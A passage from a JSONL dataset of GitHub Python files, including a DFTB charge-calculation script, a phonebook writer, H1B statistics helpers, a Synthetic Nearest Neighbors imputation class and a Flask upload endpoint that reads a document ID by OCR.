[SearchResult]\n}}\n\"\"\"\n","repo_name":"masipcat/guillotina_graphql","sub_path":"guillotina_graphql/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24231792085","text":"from project_utilities import *\nimport numba\nimport numpy as np\n\n@numba.njit(parallel = True)\ndef electronic_energy_numba(occs,vecs,H0):\n E = 0\n for a in range(len(occs)):\n for u in range(len(vecs)):\n for v in range(len(vecs)):\n E += occs[a]*vecs[u,a]*vecs[v,a]*H0[u,v]\n return E\n\ndef electronic_energy(occs,C,H0):\n return electronic_energy_numba(occs,C,H0)\n\ndef coulombE(mol,gamma,charges):\n atoms = mol.atom_numbers()\n E = 0\n for i in range(len(atoms)):\n for j in range(len(atoms)):\n E+=charges[i]*gamma[i,j]*charges[j]\n return (1/2)*E\n\n@numba.njit(parallel = True)\ndef numba_charce_calc(atoms,coeffs,occupations,S,mapping,num_H = 1,num_O = 4,num_S = 9):\n charges = np.zeros(len(atoms),dtype = np.float64)\n C = coeffs.copy()\n electrons = np.array([0,1,2,1,2,3,4,5,6,7,8,1,2,3,4,5,6,7,8])\n num_elec = np.zeros(len(atoms))\n number_of_pairs = 0\n for i in occupations:\n number_of_pairs += i\n number_of_pairs /= 2\n number_of_pairs = int(number_of_pairs)\n for i in range(len(atoms)):\n index = atoms[i]\n num_elec[i] = electrons[index]\n for j in range(len(atoms)):\n offset = 0\n for i in range(j):\n offset += mapping[atoms[i]]\n ranging = np.array([offset,offset + mapping[atoms[j]]])\n for i in range(number_of_pairs):\n for u in range(ranging[0],ranging[1]):\n for v in range(S.shape[0]):\n a = occupations[i]*(C[u,i]*S[u,v]*C[v,i] + C[v,i]*S[v,u]*C[u,i])\n charges[j] += a\n return num_elec - (1/2)*charges\n\ndef charge_calc(mol,coeffs,occupations,S,num_H = 1,num_O = 4,num_S = 9):\n mapping = [0,num_H,num_H,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_S,num_S,num_S,num_S,num_S,num_S,num_S,num_S]\n mapping = np.array([int(x) for x in mapping])\n atoms = mol.atom_numbers()\n atoms = np.array([int(x) for x in atoms])\n occupations = np.array([int(x) for x in occupations])\n return numba_charce_calc(atoms,coeffs,occupations,S,mapping,num_H = num_H,num_O = num_O,num_S = num_S)\n\n@numba.njit(parallel = True)\ndef numba_hamiltonian(atoms,charges,gamma,mapping,S):\n corrected = np.zeros(gamma.shape)\n for i in range(gamma.shape[0]):\n for j in range(gamma.shape[1]):\n for a in range(charges.shape[0]):\n corrected[i,j] += (gamma[i,a] + gamma[j,a])*charges[a]\n corrected2 = np.zeros(S.shape)\n for j in range(len(atoms)):\n offset = 0\n for i in range(j):\n offset += mapping[atoms[i]]\n ranging = np.array([offset,offset + mapping[atoms[j]]])\n for i in range(len(atoms)):\n if i >= j:\n offset = 0\n for k in range(i):\n offset += mapping[atoms[k]]\n ranging2 = np.array([offset,offset + mapping[atoms[i]]])\n corrected2[ranging[0]:ranging[1],ranging2[0]:ranging2[1]] = corrected[i,j]\n corrected2[ranging2[0]:ranging2[1],ranging[0]:ranging[1]] = corrected[j,i]\n return corrected2\n\ndef hamiltonian(mol,H0,S,charges,gamma,num_H = 1,num_O = 4,num_S = 9):\n atoms = mol.atom_numbers()\n atoms = np.array([int(x) for x in atoms])\n mapping = [0,num_H,num_H,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_O,num_S,num_S,num_S,num_S,num_S,num_S,num_S,num_S]\n mapping = np.array([int(x) for x in mapping])\n corrected = numba_hamiltonian(atoms,charges,gamma,mapping,S)\n corrected = H0 - (1/2)*S*corrected\n return corrected\n\ndef SCC(mol,occupations,H0,S,gamma,num_H = 1,num_O = 4,num_S = 
9,iterations = 10,charge = [None]):\n charges = np.zeros((iterations,len(mol.atoms)))\n energies = np.zeros(iterations)\n H = H0.copy()\n if charge[0] != None:\n H = hamiltonian(mol,H0,S,charge,gamma,num_H = num_H,num_O = num_O,num_S = num_S)\n for i in range(iterations):\n eigs,vecs = eig(np.linalg.inv(S)@ H)\n SB = vecs.T @ S @ vecs\n norm_vecs = normalize(vecs,SB)\n charge = charge_calc(mol,norm_vecs,occupations,S,num_H = num_H,num_O = num_O,num_S = num_S)\n charges[i] = charge\n energies[i] = coulombE(mol,gamma,charge)\n H = hamiltonian(mol,H0,S,charge,gamma,num_H = num_H,num_O = num_O,num_S = num_S)\n return charges,energies\n","repo_name":"tobyvg/master_project_scripts","sub_path":"Some_scripts/dftb.py","file_name":"dftb.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21661725824","text":"a = []\r\nb = []\r\n\r\n\r\nclass contact:\r\n def __init__(self, name, number,):\r\n self.name = name\r\n self.number = number\r\n\r\n def write_contact(self):\r\n f1 = open(\"phonebook.txt\", \"a\")\r\n f1.write(self.name)\r\n f1.write(\"\\n\")\r\n f1.write(self.number)\r\n f1.write(\"\\n\")\r\n f1.close()\r\n\r\n def read_contact(self):\r\n f2 = open(\"phonebook.txt\", \"r\")\r\n self.name = f2.read()\r\n print(self.name)\r\n f2.close()\r\n\r\n\r\nn = int(input(\"How many inputs you want to insert inside the file: \"))\r\ni = 0\r\nwhile(i < n):\r\n name = str(input(\"Enter the name of contact: \"))\r\n number = str(input(\"Enter the phone number of the person: \"))\r\n cont = contact(name, number)\r\n write = cont.write_contact()\r\n i += 1\r\nread = cont.read_contact()\r\nf = open(\"phonebook.txt\", \"r\")\r\nap = f.readlines()\r\nf.close()\r\nprint(ap)\r\nnw1 = []\r\nnw2 = []\r\nfor i in range(len(ap)):\r\n nw1.append(ap[i])\r\n nw1 = \"\".join(nw1)\r\n nw1 = list(nw1)\r\n nw1.remove('\\n')\r\n j = 0\r\n while (j < len(nw1)):\r\n if(len(nw1[j]) == 1):\r\n nw1[j: len(nw1)] = [\"\".join(nw1[j: len(nw1)])]\r\n nw2.append(nw1[j])\r\n j += 1\r\n nw1 = []\r\nprint(nw2)\r\nfor i in range(len(nw2)):\r\n if(i % 2 == 0):\r\n a.append(nw2[i])\r\n else:\r\n b.append(nw2[i])\r\nprint(a)\r\nprint(b)\r\n\r\nf = open(\"phonebooklist.txt\", \"w\")\r\nm1 = []\r\nfor i in range(0, len(a)):\r\n m1.append(len(a[i]))\r\nx1 = max(m1)\r\nm2 = []\r\nfor i in range(0, len(b)):\r\n m2.append(len(b[i]))\r\nx2 = max(m2)\r\nprint('-'*(x1+x2+4+15))\r\nf.write('-'*(x1+x2+4+15)+\"\\n\")\r\nprint(\"| SN | Name | Phone No. |\")\r\nf.write(\"| SN | Name | Phone No. 
|\"+\"\\n\")\r\nprint('-'*(x1+x2+4+15))\r\nf.write('-'*(x1+x2+4+15)+\"\\n\")\r\nfor i in range(0, len(a)):\r\n i1 = str(i+1)\r\n print(\"|\", i1, ' '*(3-len(i1)), \"|\", a[i], ' '*(\r\n (x1) - len(a[i])), \"|\", b[i], ' '*((x2) - len(b[i])), \"|\")\r\n f.write(\"| \" + i1 + ' '*(3-len(i1)) + \" | \" + a[i] + ' '*(\r\n (x1) - len(a[i])) + \" | \" + b[i] + ' '*((x2) - len(b[i])) + \" |\"+\"\\n\")\r\n print('-'*(x1+x2+4+15))\r\n f.write('-'*(x1+x2+4+15)+\"\\n\")\r\nf.close()\r\n\r\n# A CODE BY TUSHAR SINGH","repo_name":"CodeTusharSingh/Python_Assignment","sub_path":"phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"44691789510","text":"import re\nimport sys\n\n##\nclass count_instances(dict):\n '''Instance counter implemented as a Dict subclass.\n Elements are stored as dictionary keys and their counts\n are stored as dictionary values.\n NOTE: An alternative to this can be using the Counter object in Collections,\n which may provide a more wider range of functionality than this fuction\n \n '''\n\n def __init__(*args, **kwds):\n '''Initial an empty object for counting instances.\n '''\n self, *args = args\n super(count_instances, self).__init__()\n self.update(*args, **kwds)\n\n def __missing__(self, key):\n '''This ensures that a missing key does not raise KeyError\n '''\n return 0\n\n def sort_by_val(self, n=None):\n '''Function to sort through the counted instances using the values first\n and then in case of ties, alphabetically\n '''\n if n is None: n=len(self.items())\n return sorted(self.items(), key=lambda item: (-item[1], item[0]), reverse = False)[:n]\n##\ndef clean(line):\n '''This function is used to process through a line from the file if parsing\n does not work properly '''\n\n # We first search for and ignore any special characters which may effect REGEX\n line = re.sub(r'(?i)[^a-z0-9;\" +-]','',line)\n # Find portions of string within \" \", look for ';' and replace them\n matches = re.findall('\\\".+?\\\"',line)\n for match in matches:\n line = re.sub(''.join(match),''.join(match).replace(';',''),line)\n return [s.strip() for s in line.split(\";\")]\n\n##\ndef get_indices(header):\n '''This function is used to get valid indices from the header of each file\n Files prior to 2014 have the first format while the laters ones have the second\n one. 
'''\n try:\n idx1 = header.index('LCA_CASE_SOC_NAME')\n idx2 = header.index('LCA_CASE_WORKLOC1_STATE')\n idx3 = header.index('STATUS')\n except:\n idx1 = header.index('SOC_NAME')\n idx2 = header.index('WORKSITE_STATE')\n idx3 = header.index('CASE_STATUS')\n return idx1,idx2,idx3\n\n##\ndef write_output(sorted_list,total,nfile):\n '''This function is used to generate the top10**.txt files as requested'''\n \n if nfile.find('state') != -1:\n op_header = ('TOP_STATES','NUMBER_CERTIFIED_APPLICATIONS','PERCENTAGE')\n elif nfile.find('occupation') != -1:\n op_header = ('TOP_OCCUPATIONS','NUMBER_CERTIFIED_APPLICATIONS','PERCENTAGE')\n \n with open(nfile,'w') as op_file:\n print('%s;%s;%s' %op_header,file=op_file)\n for item in sorted_list:\n print('%s;%i;%0.1f%%' %(item[0],item[1],item[1]*100/total),file=op_file)\n op_file.close()\n\n","repo_name":"anaszain89/h1b_data_statistics","sub_path":"src/h1b_statistic_lib.py","file_name":"h1b_statistic_lib.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39487976359","text":"#shttps://leetcode.com/problems/smallest-subsequence-of-distinct-characters/discuss/308210/JavaPython-Stack-Solution-O(N)\r\nclass Solution:\r\n def smallestSubsequence(self, S):\r\n last = {c: i for i, c in enumerate(S)}\r\n stack = []\r\n for i, c in enumerate(S):\r\n if c in stack: continue\r\n while stack and stack[-1] > c and i < last[stack[-1]]:\r\n stack.pop()\r\n stack.append(c)\r\n return \"\".join(stack)\r\n\r\nprint(Solution().smallestSubsequence(\"cdadabcc\"))","repo_name":"yigalirani/leetcode","sub_path":"1081_Smallest_Subsequence_of_Distinct_Characters.py","file_name":"1081_Smallest_Subsequence_of_Distinct_Characters.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39589561694","text":"from django.contrib import admin\n\nfrom apps.overrides.admin import AutofillCreatorModelAdmin, linkify\nfrom apps.reputation.models import PlusRep\n\n\n@admin.register(PlusRep)\nclass PlusRepAdmin(AutofillCreatorModelAdmin):\n autocomplete_fields = [\"giver\", \"receiver\"]\n list_display = (\n \"id\",\n \"created_at\",\n linkify(\"giver\"),\n linkify(\"receiver\"),\n \"message\",\n \"creator\",\n )\n list_filter = (\n \"giver\",\n \"receiver\",\n \"creator\",\n )\n fields = (\"giver\", \"receiver\", \"message\", \"creator\")\n","repo_name":"HaloFunTime/hft-backend","sub_path":"apps/reputation/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"35509611706","text":"from SWS_Scraping import *\nfrom Wind_Dictionary import *\nimport time\n\n\ndef main():\n # Initialize the SWS Site\n SWS_Site = WebScrape()\n\n # Select the available years\n Years = [str(Year) for Year in range(2016, 2024)]\n final_dataframes = []\n for Year in Years:\n # Select the usable months and days from the Wind_Dictionary Library\n date_dic = WindDictionary(Year)\n Months = date_dic.getMonths()\n for Month in Months:\n Days = date_dic.getDays(Month)\n for day in Days: \n SWS_Site.selectDate(Year, Month, day)\n time.sleep(2)\n\n # Downloading Data \n final_dataframes.append(SWS_Site.collectData())\n print(f\"Day added from {Year} - {Month}\", flush = True)\n \n SWS_Site.end()\n complete_dataset = pd.concat(final_dataframes)\n complete_dataset.to_csv(f'SquamishWind.csv', 
index=False)\n return complete_dataset\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TommyR2/SWS_Scraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31745927795","text":"\"\"\"\nSynthetic Nearest Neighbors algorithm\n\"\"\"\nimport sys\nimport warnings \nimport random\nimport numpy as np \nimport networkx as nx\nfrom networkx.algorithms.clique import find_cliques\nfrom sklearn.utils import check_array\n\nclass SyntheticNearestNeighbors(): \n\t\"\"\"\n\tImpute missing entries in a matrix via SNN algorithm\n\t\"\"\"\n\tdef __init__(\n\t\t\tself,\n\t\t\tn_neighbors=1, \n\t\t\tweights='uniform',\n\t\t\trandom_splits=False,\n\t\t\tmax_rank=None,\n\t\t\tspectral_t=None,\n\t\t\tlinear_span_eps=0.1,\n\t\t\tsubspace_eps=0.1, \n\t\t\tmin_value=None,\n\t\t\tmax_value=None,\n\t\t\tverbose=True): \n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\tn_neighbors : int \n\t\tNumber of synthetic neighbors to construct\n\n\t\tweights : str \n\t\tWeight function used in prediction. Possible values: \n\t\t(a) 'uniform': each synthetic neighbor is weighted equally \n\t\t(b) 'distance': weigh points inversely with distance (as per train error)\n\n\t\trandom_splits : bool \n\t\tRandomize donors prior to splitting \n\n\t\tmax_rank : int \n\t\tPerform truncated SVD on training data with this value as its rank \n\n\t\tspectral_t : float \n\t\tPerform truncated SVD on training data with (100*thresh)% of spectral energy retained. \n\t\tIf omitted, then the default value is chosen via Donoho & Gavish '14 paper. \n\n\t\tlinear_span_eps : float\n\t\tIf the (normalized) train error is greater than (100*linear_span_eps)%,\n\t\tthen the missing pair fails the linear span test. \n\n\t\tsubspace_eps : float\n\t\tIf the test vector (used for predictions) does not lie within (100*subspace_eps)% of \n\t\tthe span covered by the training vectors (used to build the model), \n\t\tthen the missing pair fails the subspace inclusion test. 
\n\n\tmin_value : float \n\tMinimum possible imputed value \n\n\tmax_value : float \n\tMaximum possible imputed value \n\n\tverbose : bool \n\t\"\"\"\n\t\tself.n_neighbors = n_neighbors \n\t\tself.weights = weights\n\t\tself.random_splits = random_splits\n\t\tself.max_rank = max_rank \n\t\tself.spectral_t = spectral_t\n\t\tself.linear_span_eps = linear_span_eps\n\t\tself.subspace_eps = subspace_eps\n\t\tself.min_value = min_value \n\t\tself.max_value = max_value \n\t\tself.verbose = verbose\n\n\tdef __repr__(self):\n\t\t\"\"\" \n\t\tprint parameters of SNN class\n\t\t\"\"\"\n\t\treturn str(self)\n\n\tdef __str__(self):\n\t\tfield_list = []\n\t\tfor (k, v) in sorted(self.__dict__.items()):\n\t\t\tif (v is None) or (isinstance(v, (float, int))):\n\t\t\t\tfield_list.append(\"%s=%s\" % (k, v))\n\t\t\telif isinstance(v, str):\n\t\t\t\tfield_list.append(\"%s='%s'\" % (k, v))\n\t\treturn \"%s(%s)\" % (\n\t\t\tself.__class__.__name__,\", \".join(field_list))\n\n\tdef _check_input_matrix(self, X, missing_mask):\n\t\t\"\"\"\n\t\tcheck to make sure that the input matrix \n\t\tand its mask of missing values are valid.\n\t\t\"\"\"\n\t\tif len(X.shape)!=2:\n\t\t\traise ValueError(\n\t\t\t\t\"expected 2d matrix, got %s array\" % (X.shape,)\n\t\t\t)\n\t\t(m, n) = X.shape \n\t\tif not len(missing_mask)>0: \n\t\t\twarnings.simplefilter(\"always\")\n\t\t\twarnings.warn(\n\t\t\t\t\"input matrix is not missing any values\"\n\t\t\t)\n\t\tif len(missing_mask)==int(m*n): \n\t\t\traise ValueError(\n\t\t\t\t\"input matrix must have some observed (i.e., non-missing) values\"\n\t\t\t)\n\n\tdef _prepare_input_data(self, X, missing_mask):\n\t\t\"\"\"\n\t\tprepare input matrix X. return if valid else terminate \n\t\t\"\"\"\n\t\tX = check_array(X, force_all_finite=False)\n\t\tif (X.dtype!=\"f\") and (X.dtype!=\"d\"):\n\t\t\tX = X.astype(float)\n\t\tself._check_input_matrix(X, missing_mask)\n\t\treturn X\n\n\tdef _check_weights(self, weights):\n\t\t\"\"\"\n\t\tcheck to make sure weights are valid\n\t\t\"\"\"\n\t\tif weights not in (\"uniform\", \"distance\"):\n\t\t\traise ValueError(\n\t\t\t\t\"weights not recognized: should be 'uniform' or 'distance'\"\n\t\t\t)\n\t\treturn weights\n\n\tdef _split(self, arr, k):\n\t\t\"\"\"\n\t\tsplit array arr into k subgroups of roughly equal size\n\t\t\"\"\"\n\t\t(m, n) = divmod(len(arr), k)\n\t\treturn (arr[i*m + min(i, n): (i+1)*m + min(i+1, n)] for i in range(k))\n\n\tdef _find_anchors(self, X, missing_pair): \n\t\t\"\"\"\n\t\tfind model learning submatrix by reducing to max biclique problem\n\t\t\"\"\"\n\t\t(missing_row, missing_col) = missing_pair\n\t\tobs_rows = np.argwhere(~np.isnan(X[:, missing_col])).flatten()\n\t\tobs_cols = np.argwhere(~np.isnan(X[missing_row, :])).flatten()\n\n\t\t# dennis: make sure (i,j) not in (obs_rows, obs_cols)\n\n\t\t# create bipartite incidence matrix \n\t\tB = X[obs_rows]\n\t\tB = B[:, obs_cols]\n\t\tif not np.any(np.isnan(B)): # check if fully connected already\n\t\t\treturn (obs_rows, obs_cols)\n\t\tB[np.isnan(B)] = 0 \n\n\t\t# bipartite graph \n\t\t(n_rows, n_cols) = B.shape \n\t\tA = np.block([[np.ones((n_rows, n_rows)), B],\n\t\t \t\t\t [B.T, np.ones((n_cols, n_cols))]])\n\t\tG = nx.from_numpy_matrix(A)\n\n\t\t# find max clique that yields the most square (nxn) matrix\n\t\tcliques = list(find_cliques(G))\n\t\td_min = 0 \n\t\tmax_clique_rows_idx = False\n\t\tmax_clique_cols_idx = False\n\t\tfor clique in cliques: \n\t\t\tclique = np.sort(clique)\n\t\t\tclique_rows_idx = clique[clique<n_rows]\n\t\t\tclique_cols_idx = clique[clique>=n_rows] - n_rows\n\t\t\td = min(len(clique_rows_idx), len(clique_cols_idx))\n\t\t\tif d>d_min: \n\t\t\t\td_min = d \n\t\t\t\tmax_clique_rows_idx = clique_rows_idx\n\t\t\t\tmax_clique_cols_idx = clique_cols_idx\n\n\t\t# determine model learning rows & cols \n\t\tanchor_rows = obs_rows[max_clique_rows_idx]\n\t\tanchor_cols = obs_cols[max_clique_cols_idx]\n\t\treturn (anchor_rows, anchor_cols)\n\n\tdef _spectral_rank(self, s):\n\t\t\"\"\"\n\t\tretain all singular values that compose at least (100*self.spectral_t)% spectral energy\n\t\t\"\"\"\n\t\tif self.spectral_t==1.0: \n\t\t\trank = len(s)\n\t\telse: \n\t\t\ttotal_energy = (s**2).cumsum() / (s**2).sum()\n\t\t\trank = list((total_energy>self.spectral_t)).index(True) + 1\n\t\treturn rank\n\n\tdef _universal_rank(self, s, ratio): \n\t\t\"\"\"\n\t\tretain all singular values above optimal threshold as per Donoho & Gavish '14:\n\t\thttps://arxiv.org/pdf/1305.5870.pdf\n\t\t\"\"\" \n\t\tomega = 0.56*ratio**3 - 0.95*ratio**2 + 1.43 + 1.82*ratio\n\t\tt = omega * np.median(s) \n\t\trank = max(len(s[s>t]), 1)\n\t\treturn rank \n\n\tdef _pcr(self, X, y):\n\t\t\"\"\"\n\t\tprincipal component regression (PCR) \n\t\t\"\"\"\n\t\t(u, s, v) = np.linalg.svd(X, full_matrices=False)\n\t\tif self.max_rank is not None: \n\t\t\trank = self.max_rank \n\t\telif self.spectral_t is not None: \n\t\t\trank = self._spectral_rank(s)\n\t\telse: \n\t\t\t(m, n) = X.shape \n\t\t\trank = self._universal_rank(s, ratio=m/n)\n\t\ts_rank = s[:rank]\n\t\tu_rank = u[:, :rank]\n\t\tv_rank = v[:rank, :] \n\t\tbeta = ((v_rank.T/s_rank) @ u_rank.T) @ y\n\t\treturn (beta, u_rank, s_rank, v_rank)\n\n\tdef _clip(self, x):\n\t\t\"\"\"\n\t\tclip values to fall within range [min_value, max_value]\n\t\t\"\"\"\n\t\tif self.min_value is not None:\n\t\t\tx = self.min_value if x<self.min_value else x \n\t\tif self.max_value is not None:\n\t\t\tx = self.max_value if x>self.max_value else x \n\t\treturn x\n\n\tdef _train_error(self, X, y, beta): \n\t\t\"\"\"\n\t\tcompute (normalized) training error\n\t\t\"\"\" \n\t\ty_pred = X @ beta \n\t\tdelta = np.linalg.norm(y_pred-y)\n\t\tratio = delta / np.linalg.norm(y)\n\t\treturn ratio**2\n\n\tdef _subspace_inclusion(self, V1, X2):\n\t\t\"\"\"\n\t\tcompute subspace inclusion statistic \n\t\t\"\"\" \n\t\tdelta = (np.eye(V1.shape[1]) - (V1.T@V1)) @ X2 \n\t\tratio = np.linalg.norm(delta) / np.linalg.norm(X2)\n\t\treturn ratio**2\n\n\tdef _isfeasible(self, train_error, subspace_inclusion_stat): \n\t\t\"\"\"\n\t\tcheck feasibility of prediction\n\t\tTrue iff linear span + subspace inclusion tests both pass\n\t\t\"\"\" \n\t\t# linear span test\n\t\tls_feasible = True if train_error<=self.linear_span_eps else False \n\n\t\t# subspace test\n\t\ts_feasible = True if subspace_inclusion_stat<=self.subspace_eps else False \n\t\treturn True if (ls_feasible and s_feasible) else False \n\n\tdef _synth_neighbor(self, X, missing_pair, anchor_rows, anchor_cols, covariates=None): \n\t\t\"\"\"\n\t\tconstruct the k-th synthetic neighbor \n\t\t\"\"\"\n\t\t# initialize\n\t\t(missing_row, missing_col) = missing_pair\n\t\ty1 = X[missing_row, anchor_cols]\n\t\tX1 = X[anchor_rows, :] \n\t\tX1 = X1[:, anchor_cols]\n\t\tX2 = X[anchor_rows, missing_col]\n\n\t\t# add covariates\n\t\tif covariates is not None: \n\t\t\ty1_covariates = np.hstack([y1, covariates[missing_row]])\n\t\t\tX1_covariates = np.hstack([X1, covariates[anchor_rows]])\n\t\telse:\n\t\t\ty1_covariates = y1.copy()\n\t\t\tX1_covariates = X1.copy()\n\n\t\t# learn k-th synthetic neighbor\n\t\t(beta, _, s_rank, v_rank) = self._pcr(X1_covariates.T, y1_covariates)\n\n\t\t# prediction\n\t\tpred = self._clip(X2@beta) \n\n\t\t# diagnostics 
\n\t\ttrain_error = self._train_error(X1.T, y1, beta)\n\t\tsubspace_inclusion_stat = self._subspace_inclusion(v_rank, X2) \n\t\tfeasible = self._isfeasible(train_error, subspace_inclusion_stat)\n\n\t\t# assign weight of k-th synthetic neighbor\n\t\tif self.weights=='uniform':\n\t\t\tweight = 1 \n\t\telif self.weights=='distance':\n\t\t\td = train_error + subspace_inclusion_stat\n\t\t\tweight = 1/d if d>0 else sys.float_info.max\n\t\treturn (pred, feasible, weight)\n\n\tdef _predict(self, X, missing_pair, covariates=None): \n\t\t\"\"\" \n\t\tcombine predictions from all synthetic neighbors \n\t\t\"\"\"\n\t\t# find anchor rows and cols\n\t\t(anchor_rows, anchor_cols) = self._find_anchors(X, missing_pair=missing_pair) \n\t\tif not anchor_rows.size: \n\t\t\t(pred, feasible) = (np.nan, False)\n\t\telse: \n\t\t\tif self.random_splits:\n\t\t\t\tanchor_rows = np.random.permutation(anchor_rows)\n\t\t\tanchor_rows_splits = list(self._split(anchor_rows, \n\t\t\t\t\t\t\t\t\t\t\t\t k=self.n_neighbors))\n\t\t\tpred = np.zeros(self.n_neighbors)\n\t\t\tfeasible = np.zeros(self.n_neighbors)\n\t\t\tw = np.zeros(self.n_neighbors)\n\n\t\t\t# iterate through all row splits\n\t\t\tfor (k, anchor_rows_k) in enumerate(anchor_rows_splits): \n\t\t\t\t(pred[k], feasible[k], w[k]) = self._synth_neighbor(X,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t missing_pair=missing_pair, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t anchor_rows=anchor_rows_k, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t anchor_cols=anchor_cols,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t covariates=covariates)\n\t\t\tw /= np.sum(w)\n\t\t\tpred = np.average(pred, weights=w)\n\t\t\tfeasible = all(feasible)\n\t\treturn (pred, feasible)\n\n\tdef fit_transform(self, X, covariates=None, test_set=None): \n\t\t\"\"\"\n\t\tcomplete missing entries in matrix \n\t\t\"\"\" \n\t\t# get missing entries to impute\n\t\tmissing_set = test_set if test_set is not None else np.argwhere(np.isnan(X))\n\t\tnum_missing = len(missing_set)\n\n\t\t# check and prepare data \n\t\tX = self._prepare_input_data(X, missing_set)\n\n\t\t# check weights\n\t\tself.weights = self._check_weights(self.weights)\n\n\t\t# initialize \n\t\tX_imputed = X.copy() \n\t\tstd_matrix = np.zeros(X.shape)\n\t\tself.feasible = np.empty(X.shape)\n\t\tself.feasible.fill(np.nan)\n\n\t\t# complete missing entries \n\t\tfor (i, missing_pair) in enumerate(missing_set): \n\t\t\tif self.verbose: \n\t\t\t\tprint(\"[SNN] iteration {} of {}\".format(i+1, num_missing))\n\n\t\t\t# predict missing entry\n\t\t\t(pred, feasible) = self._predict(X, \n\t\t\t\t\t\t\t\t\t\t\t missing_pair=missing_pair,\n\t\t\t\t\t\t\t\t\t \t covariates=covariates)\n\n\t\t\t# store in imputed matrices\n\t\t\t(missing_row, missing_col) = missing_pair\n\t\t\tX_imputed[missing_row, missing_col] = pred \n\t\t\tself.feasible[missing_row, missing_col] = feasible\n\n\t\tif self.verbose:\n\t\t\tprint(\"[SNN] complete\")\n\t\treturn X_imputed\n\n\n\n\n","repo_name":"deshen24/syntheticNN","sub_path":"snn.py","file_name":"snn.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"26341540170","text":"import requests\n\nclass APITestCase:\n # def __init__(self, base_url):\n # self.base_url = base_url\n\n def send_request(self, method, url, params=None, data=None):\n response = requests.request(method, url, params=params, json=data)\n return response\n\n def validate_response_code(self, response, expected_status_code):\n #assert response.status_code == expected_status_code, f\"Expected status 
code {expected_status_code}, but got {response.status_code}.\"\n if response.status_code == expected_status_code:\n return True\n else:\n return False\n\n def validate_json(self, response, expected_json):\n assert response.json() == expected_json, f\"Expected JSON {expected_json}, but got {response.json()}.\"\n\n def validate_response_time(self, response):\n response_time = response.elapsed.total_seconds()\n assert response_time < 1500, \"Response time is not less than 1500ms\"\n\n def get_user_id_by_title(self, endpoint, title):\n #url = 'https://jsonplaceholder.typicode.com/posts'\n url = self.base_url + endpoint\n params = {'title': title}\n\n response = requests.get(url, params=params)\n if response.status_code == 200:\n data = response.json()\n if data:\n return data[0]['userId']\n else:\n raise ValueError('Title not found.')\n else:\n raise ValueError('Error occurred while fetching data.')\n\n","repo_name":"nileshrmore15/JsonholderApi","sub_path":"JsonholderApi/Utilities/APIhelper.py","file_name":"APIhelper.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30654882714","text":"import asyncio\nimport re\n\nfrom flask import Flask\n\nfrom ocr_reader import getDocumentId\n\nUPLOAD_FOLDER = 'C:/uploads'\n\napp = Flask(__name__)\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024\n\nimport os\nimport urllib.request\n\nfrom flask import Flask, request, redirect, jsonify\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@app.route('/file-upload', methods=['POST'])\nasync def upload_file():\n # check if the post request has the file part\n if 'file' not in request.files:\n resp = jsonify({'message': 'No file part in the request'})\n resp.status_code = 400\n return resp\n file = request.files['file']\n if file.filename == '':\n resp = jsonify({'message': 'No file selected for uploading'})\n resp.status_code = 400\n return resp\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n result = await get_document_id(f'{UPLOAD_FOLDER}/{filename}')\n if len(result) == 0:\n result = 'Not Detected'\n\n resp = jsonify({'message': f'File successfully uploaded named {result}'})\n resp.status_code = 201\n os.remove(f'{UPLOAD_FOLDER}/{filename}')\n return resp\n else:\n resp = jsonify({'message': 'Allowed file types are txt, pdf, png, jpg, jpeg, gif'})\n resp.status_code = 400\n return resp\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host=\"0.0.0.0\", port=port)\n\n\nasync def get_document_id(path):\n result = getDocumentId(path)\n length = 10\n var = [word for word in result.split() if len(word) == length]\n doc_name = ''\n for tenWord in var:\n if bool(re.search(r'^[a-zA-Z]{5}[0-9]{4}[a-zA-Z]$', re.sub(r'\\s+', '', tenWord))):\n doc_name = re.search(r'^[a-zA-Z]{5}[0-9]{4}[a-zA-Z]$', re.sub(r'\\s+', '', tenWord)).string\n break\n else:\n doc_name = ''\n print(f'document name {doc_name}')\n return 
